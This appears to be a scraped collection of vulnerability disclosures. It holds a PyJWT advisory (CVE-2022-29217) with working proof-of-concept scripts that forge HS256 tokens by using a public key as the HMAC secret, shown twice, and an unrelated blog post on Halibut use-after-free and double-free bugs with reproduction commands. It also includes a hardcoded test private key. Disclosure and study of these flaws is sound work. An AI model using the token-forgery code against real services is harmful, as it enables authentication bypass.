from cryptography.hazmat.primitives.asymmetric import ed25519

# Generate ed25519 private key
private_key = ed25519.Ed25519PrivateKey.generate()

# Get private key bytes as they would be stored in a file
priv_key_bytes = 
private_key.private_bytes(encoding=serialization.Encoding.PEM,format=serialization.PrivateFormat.PKCS8, 
encryption_algorithm=serialization.NoEncryption())

# Get public key bytes as they would be stored in a file
pub_key_bytes = 
private_key.public_key().public_bytes(encoding=serialization.Encoding.OpenSSH,format=serialization.PublicFormat.OpenSSH)

# Making a good jwt token that should work by signing it with the 
private key
encoded_good = jwt.encode({"test": 1234}, priv_key_bytes, algorithm="EdDSA")

# Using HMAC with the public key to trick the receiver to think that the 
public key is a HMAC secret
encoded_bad = jwt.encode({"test": 1234}, pub_key_bytes, algorithm="HS256")

# Both of the jwt tokens are validated as valid
decoded_good = jwt.decode(encoded_good, pub_key_bytes, 
algorithms=jwt.algorithms.get_default_algorithms())
decoded_bad = jwt.decode(encoded_bad, pub_key_bytes, 
algorithms=jwt.algorithms.get_default_algorithms())

if decoded_good == decoded_bad:
     print("POC Successfull")

# Of course the receiver should specify ed25519 algorithm to be used if 
they specify ed25519 public key. However, if other algorithms are used, 
the POC does not work
# HMAC specifies illegal strings for the HMAC secret in jwt/algorithms.py
#
#        invalid_strings = [
#            b"-----BEGIN PUBLIC KEY-----",
#            b"-----BEGIN CERTIFICATE-----",
#            b"-----BEGIN RSA PUBLIC KEY-----",
#            b"ssh-rsa",
#        ]
#
# However, OKPAlgorithm (ed25519) accepts the following in 
jwt/algorithms.py:
#
#                if "-----BEGIN PUBLIC" in str_key:
#                    return load_pem_public_key(key)
#                if "-----BEGIN PRIVATE" in str_key:
#                    return load_pem_private_key(key, password=None)
#                if str_key[0:4] == "ssh-":
#                    return load_ssh_public_key(key)
#
# These should most likely made to match each other to prevent this behavior
```


```python
import jwt

#openssl ecparam -genkey -name prime256v1 -noout -out ec256-key-priv.pem
#openssl ec -in ec256-key-priv.pem -pubout > ec256-key-pub.pem
#ssh-keygen -y -f ec256-key-priv.pem > ec256-key-ssh.pub

priv_key_bytes = b"""-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIOWc7RbaNswMtNtc+n6WZDlUblMr2FBPo79fcGXsJlGQoAoGCCqGSM49
AwEHoUQDQgAElcy2RSSSgn2RA/xCGko79N+7FwoLZr3Z0ij/ENjow2XpUDwwKEKk
Ak3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw==
-----END EC PRIVATE KEY-----"""

pub_key_bytes = b"""-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAElcy2RSSSgn2RA/xCGko79N+7FwoL
Zr3Z0ij/ENjow2XpUDwwKEKkAk3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw==
-----END PUBLIC KEY-----"""

ssh_key_bytes = b"""ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJXMtkUkkoJ9kQP8QhpKO/TfuxcKC2a92dIo/xDY6MNl6VA8MChCpAJN0w1wvVPJ4qTJRnGO7A6V6dl8oRxDPkc="""

# Making a good jwt token that should work by signing it with the private key
encoded_good = jwt.encode({"test": 1234}, priv_key_bytes, algorithm="ES256")

# Using HMAC with the ssh public key to trick the receiver to think that the public key is a HMAC secret
encoded_bad = jwt.encode({"test": 1234}, ssh_key_bytes, algorithm="HS256")

# Both of the jwt tokens are validated as valid
decoded_good = jwt.decode(encoded_good, ssh_key_bytes, algorithms=jwt.algorithms.get_default_algorithms())
decoded_bad = jwt.decode(encoded_bad, ssh_key_bytes, algorithms=jwt.algorithms.get_default_algorithms())

if decoded_good == decoded_bad:
    print("POC Successfull")
else:
    print("POC Failed")
```

> The issue is not that big as 
> algorithms=jwt.algorithms.get_default_algorithms() has to be used. 
> However, with quick googling, this seems to be used in some cases at 
> least in some minor projects.

### Patches

Users should upgrade to v2.4.0.

### Workarounds

Always be explicit with the algorithms that are accepted and expected when decoding.

### References
_Are there any links users can visit to find out more?_

### For more information
If you have any questions or comments about this advisory:
* Open an issue in https://github.com/jpadilla/pyjwt
* Email José Padilla: pyjwt at jpadilla dot com


**Impact**

_What kind of vulnerability is it? Who is impacted?_

Disclosed by Aapo Oksman (Senior Security Specialist, Nixu Corporation).

> PyJWT supports multiple different JWT signing algorithms. With JWT, an  
> attacker submitting the JWT token can choose the used signing algorithm.
> 
> The PyJWT library requires that the application chooses what algorithms  
> are supported. The application can specify  
> "jwt.algorithms.get\_default\_algorithms()" to get support for all  
> algorithms. They can also specify a single one of them (which is the  
> usual use case if calling jwt.decode directly. However, if calling  
> jwt.decode in a helper function, all algorithms might be enabled.)
> 
> For example, if the user chooses "none" algorithm and the JWT checker  
> supports that, there will be no signature checking. This is a common  
> security issue with some JWT implementations.
> 
> PyJWT combats this by requiring that the if the "none" algorithm is  
> used, the key has to be empty. As the key is given by the application  
> running the checker, attacker cannot force "none" cipher to be used.
> 
> Similarly with HMAC (symmetric) algorithm, PyJWT checks that the key is  
> not a public key meant for asymmetric algorithm i.e. HMAC cannot be used  
> if the key begins with "ssh-rsa". If HMAC is used with a public key, the  
> attacker can just use the publicly known public key to sign the token  
> and the checker would use the same key to verify.
> 
> From PyJWT 2.0.0 onwards, PyJWT supports ed25519 asymmetric algorithm.  
> With ed25519, PyJWT supports public keys that start with "ssh-", for  
> example "ssh-ed25519".

import jwt
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import ed25519

\# Generate ed25519 private key
private\_key \= ed25519.Ed25519PrivateKey.generate()

\# Get private key bytes as they would be stored in a file
priv\_key\_bytes \= 
private\_key.private\_bytes(encoding\=serialization.Encoding.PEM,format\=serialization.PrivateFormat.PKCS8, 
encryption\_algorithm\=serialization.NoEncryption())

\# Get public key bytes as they would be stored in a file
pub\_key\_bytes \= 
private\_key.public\_key().public\_bytes(encoding\=serialization.Encoding.OpenSSH,format\=serialization.PublicFormat.OpenSSH)

\# Making a good jwt token that should work by signing it with the 
private key
encoded\_good \= jwt.encode({"test": 1234}, priv\_key\_bytes, algorithm\="EdDSA")

\# Using HMAC with the public key to trick the receiver to think that the 
public key is a HMAC secret
encoded\_bad \= jwt.encode({"test": 1234}, pub\_key\_bytes, algorithm\="HS256")

\# Both of the jwt tokens are validated as valid
decoded\_good \= jwt.decode(encoded\_good, pub\_key\_bytes, 
algorithms\=jwt.algorithms.get\_default\_algorithms())
decoded\_bad \= jwt.decode(encoded\_bad, pub\_key\_bytes, 
algorithms\=jwt.algorithms.get\_default\_algorithms())

if decoded\_good \== decoded\_bad:
     print("POC Successfull")

\# Of course the receiver should specify ed25519 algorithm to be used if 
they specify ed25519 public key. However, if other algorithms are used, 
the POC does not work
\# HMAC specifies illegal strings for the HMAC secret in jwt/algorithms.py
#
#        invalid\_strings = \[
#            b"-----BEGIN PUBLIC KEY-----",
#            b"-----BEGIN CERTIFICATE-----",
#            b"-----BEGIN RSA PUBLIC KEY-----",
#            b"ssh-rsa",
#        \]
#
\# However, OKPAlgorithm (ed25519) accepts the following in 
jwt/algorithms.py:
#
#                if "-----BEGIN PUBLIC" in str\_key:
#                    return load\_pem\_public\_key(key)
#                if "-----BEGIN PRIVATE" in str\_key:
#                    return load\_pem\_private\_key(key, password=None)
#                if str\_key\[0:4\] == "ssh-":
#                    return load\_ssh\_public\_key(key)
#
\# These should most likely made to match each other to prevent this behavior

import jwt

#openssl ecparam -genkey -name prime256v1 -noout -out ec256-key-priv.pem
#openssl ec -in ec256-key-priv.pem -pubout > ec256-key-pub.pem
#ssh-keygen -y -f ec256-key-priv.pem > ec256-key-ssh.pub

priv\_key\_bytes \= b"""-----BEGIN EC PRIVATE KEY-----
MHcCAQEEIOWc7RbaNswMtNtc+n6WZDlUblMr2FBPo79fcGXsJlGQoAoGCCqGSM49
AwEHoUQDQgAElcy2RSSSgn2RA/xCGko79N+7FwoLZr3Z0ij/ENjow2XpUDwwKEKk
Ak3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw==
\-----END EC PRIVATE KEY-----"""

pub\_key\_bytes \= b"""-----BEGIN PUBLIC KEY-----
MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAElcy2RSSSgn2RA/xCGko79N+7FwoL
Zr3Z0ij/ENjow2XpUDwwKEKkAk3TDXC9U8nipMlGcY7sDpXp2XyhHEM+Rw==
\-----END PUBLIC KEY-----"""

ssh\_key\_bytes \= b"""ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJXMtkUkkoJ9kQP8QhpKO/TfuxcKC2a92dIo/xDY6MNl6VA8MChCpAJN0w1wvVPJ4qTJRnGO7A6V6dl8oRxDPkc="""

\# Making a good jwt token that should work by signing it with the private key
encoded\_good \= jwt.encode({"test": 1234}, priv\_key\_bytes, algorithm\="ES256")

\# Using HMAC with the ssh public key to trick the receiver to think that the public key is a HMAC secret
encoded\_bad \= jwt.encode({"test": 1234}, ssh\_key\_bytes, algorithm\="HS256")

\# Both of the jwt tokens are validated as valid
decoded\_good \= jwt.decode(encoded\_good, ssh\_key\_bytes, algorithms\=jwt.algorithms.get\_default\_algorithms())
decoded\_bad \= jwt.decode(encoded\_bad, ssh\_key\_bytes, algorithms\=jwt.algorithms.get\_default\_algorithms())

if decoded\_good \== decoded\_bad:
    print("POC Successfull")
else:
    print("POC Failed")

> The issue is not that big as  
> algorithms=jwt.algorithms.get\_default\_algorithms() has to be used.  
> However, with quick googling, this seems to be used in some cases at  
> least in some minor projects.

**Patches**

Users should upgrade to v2.4.0.

**Workarounds**

Always be explicit with the algorithms that are accepted and expected when decoding.

**References**

_Are there any links users can visit to find out more?_

**For more information**

If you have any questions or comments about this advisory:

*   Open an issue in https://github.com/jpadilla/pyjwt
*   Email José Padilla: pyjwt at jpadilla dot com

**References**

*   GHSA-ffqj-6fqr-9h24
*   https://nvd.nist.gov/vuln/detail/CVE-2022-29217
*   jpadilla/pyjwt@9c52867
*   https://github.com/jpadilla/pyjwt/releases/tag/2.4.0

GHSA-ffqj-6fqr-9h24: Key confusion through non-blocklisted public key formats

A double free in cleanup_index in index.c in Halibut 1.2 allows an attacker to cause a denial of service or possibly have other unspecified impact via a crafted text document.

Over the past year I've been studying memory corruption vulnerabilities in Linux C/C++ programs, culminating in the open sourcing of a framework called ARCUS to find and explain them automatically using a combination of dynamic tracing and symbolic analysis. My work has led to two academic conference publications, one that appeared in this year's USENIX Security Symposium and another that will appear next month at ACM CCS.

Since then, I've been going through the Debian Popularity Contest and analyzing packages, leading to the discovery of vulnerabilities like CVE-2021-42006. In this post, I'd like to share **3** new vulnerabilities I've discovered in a program called Halibut, which is a _document preparation system_ that currently sits at Rank 54,752 (by number of installs) out of 182,832 packages in the popularity contest.

**Environment**

I'm using the latest official release of Halibut, version 1.2, which is available on Debian Bullseye and Ubuntu Hirsute, to name a few Linux distributions. The target architecture is x86-64.

**Double Free in cleanup_index() in index.c**

**Steps to Reproduce:**

1.  Download the PoC.
2.  Run: halibut --winhelp poc-halibut-winhelp-df

**Stack Trace:**

#0  __GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
#1  0x00007ffff7e1c537 in __GI_abort () at abort.c:79
#2  0x00007ffff7e75768 in __libc_message (action=action@entry=do_abort, fmt=fmt@entry=0x7ffff7f83e2d "%s\n") at ../sysdeps/posix/libc_fatal.c:155
#3  0x00007ffff7e7ca5a in malloc_printerr (str=str@entry=0x7ffff7f861c8 "double free or corruption (fasttop)") at malloc.c:5347
#4  0x00007ffff7e7dd55 in _int_free (av=0x7ffff7fb5b80 <main_arena>, p=0x5555556a5500, have_lock=0) at malloc.c:4266
#5  0x00005555555784c5 in sfree (p=0x5555556a5510) at ../malloc.c:63
#6  0x000055555557867d in free_word_list (w=0x5555556ab7b0) at ../malloc.c:130
#7  0x0000555555589fd6 in cleanup_index (i=0x5555556a2390) at ../index.c:203
#8  0x0000555555578154 in main (argc=0, argv=0x7fffffffe468) at ../main.c:404

**Use-After-Free in cleanup_index() in index.c**

**Steps to Reproduce:**

1.  Download the PoC.
2.  Run: halibut --text poc-halibut-text-uaf

**Stack Trace:**

#0  __GI___libc_free (mem=0x100000001) at malloc.c:3102
#1  0x00005555555784c5 in sfree (p=0x100000001) at ../malloc.c:63
#2  0x000055555557867d in free_word_list (w=0x7000700070007) at ../malloc.c:130
#3  0x000055555557869a in free_word_list (w=0x5555556f1900) at ../malloc.c:132
#4  0x0000555555589fd6 in cleanup_index (i=0x5555556a2390) at ../index.c:203
#5  0x0000555555578154 in main (argc=0, argv=0x7fffffffe478) at ../main.c:404

**Note:** This is not the same vulnerability as the one above. Notice the recursion inside free_word_list and how the PoC triggers a segmentation fault rather than a double free abort.

**Use-After-Free in info_width_internal() in bk_info.c**

**Steps to Reproduce:**

1.  Download the PoC.
2.  Run: halibut --info poc-halibut-info-uaf

**Stack Trace:**

#0  info_width_internal (words=0x5555556e92a0, xrefs=1, cfg=0x7fffffffdf80) at ../bk_info.c:974
#1  0x000055555559c419 in info_width_internal_list (words=0x5555556e92a0, xrefs=1, cfg=0x7fffffffdf80) at ../bk_info.c:953
#2  0x000055555559c669 in info_width_internal (words=0x5555556ed5b0, xrefs=1, cfg=0x7fffffffdf80) at ../bk_info.c:1009
#3  0x000055555559c776 in info_width_xrefs (ctx=0x7fffffffdf80, words=0x5555556ed5b0) at ../bk_info.c:1041
#4  0x000055555557b0cb in wrap_para (text=0x5555556ed5b0, width=66, subsequentwidth=66, widthfn=0x55555559c751 <info_width_xrefs>, ctx=0x7fffffffdf80, natural_space=0) at ../misc.c:328
#5  0x000055555559cab8 in info_para (text=0x5555556e8440, prefix=0x5555556a2d30, prefixextra=0x5555555c859c L".", input=0x5555556bcf80, keywords=0x5555556e1cd0, indent=1, extraindent=3, width=66, 
    cfg=0x7fffffffdf80) at ../bk_info.c:1120
#6  0x000055555559b38a in info_backend (sourceform=0x5555556a7dd0, keywords=0x5555556e1cd0, idx=0x5555556a2390, unused=0x0) at ../bk_info.c:579
#7  0x0000555555578119 in main (argc=0, argv=0x7fffffffe478) at ../main.c:398

**Root Cause**

According to ARCUS, the root cause appears to be frees that occur within get_token in input.c. Specifically, it labels Line 416:

if(rsc.text){
in->pushback_chars=dupstr(rsc.text+prevpos);
sfree(rsc.text);
}

And Line 469:

}elseif(c=='{'){/* tok_lbrace */
ret.type=tok_lbrace;
sfree(rsc.text);
returnret;

There are several other lines in get_token that also call sfree and might be problematic.

CVE-2021-42613: Case Study: Security Analysis of Halibut

A use after free in info_width_internal in bk_info.c in Halibut 1.2 allows an attacker to cause a segmentation fault or possibly have unspecified other impact via a crafted text document.

CVE-2021-42614: Case Study: Security Analysis of Halibut

A use after free in cleanup_index in index.c in Halibut 1.2 allows an attacker to cause a segmentation fault or possibly have other unspecified impact via a crafted text document.

Tag

#c++